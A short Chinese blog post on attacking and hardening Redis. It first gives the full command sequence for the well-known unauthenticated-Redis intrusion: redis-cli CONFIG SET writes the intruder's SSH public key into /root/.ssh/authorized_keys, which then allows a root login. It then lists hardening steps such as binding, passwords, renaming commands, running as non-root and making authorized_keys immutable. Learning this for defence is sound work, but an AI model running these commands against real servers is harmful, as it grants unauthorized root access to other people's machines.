redis攻与防

redis攻与防

 

思路:

将入侵者(centos201)的公钥写入到被入侵者(centos200,没有安全措施redis服务器)上,从而达到直联centos200的目的。 

 

1、生成本机公钥(centos201)

ssh-keygen -t rsa

 

2、在本机执行命令完成入侵

redis-cli -h centos200 -p 6379 config set dir /root/.ssh

redis-cli -h centos200 -p 6379 config set dbfilename "authorized_keys"

redis-cli -h centos200 -p 6379 flushall

(echo -e '\n';cat /root/.ssh/id_rsa.pub;echo -e '\n') | redis-cli -h centos200 -p 6379  -x set crackit

redis-cli -h centos200 -p 6379 save

 

3、本机测试

ssh centos200

 

安全防护:

1、bind参数设置:绑定访问ip,不能任意IP(0.0.0.0)都可访问

2、更改默认的6379端口

3、设置复杂度较高的密码

4、禁用相关重要命令:flushall\config\eval,举例:rename-command FLUSHALL ""

5、禁止使用root启动redis,使用一些不能登录(nologin)的账号启动服务

groupadd -r redis && useradd -r -g redis redis

6、保证 authorized_keys 文件的安全

为了保证安全,您应该阻止其他用户添加新的公钥。

将 authorized_keys 的权限设置为对拥有者只读,其他用户没有任何权限:

$ chmod 400 ~/.ssh/authorized_keys

为保证 authorized_keys 的权限不会被改掉,您还需要设置该文件的 immutable 位权限:

# chattr +i ~/.ssh/authorized_keys

然用户还可以重命名 ~/.ssh,然后新建新的 ~/.ssh 目录和 authorized_keys 文件。要避免这种情况,需要设置 ~./ssh 的 immutable 位权限:

# chattr +i ~/.ssh

注意: 如果需要添加新的公钥,需要移除 authorized_keys 的 immutable 位权限。然后,添加好新的公钥之后,按照上述步骤重新加上 immutable 位权限。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值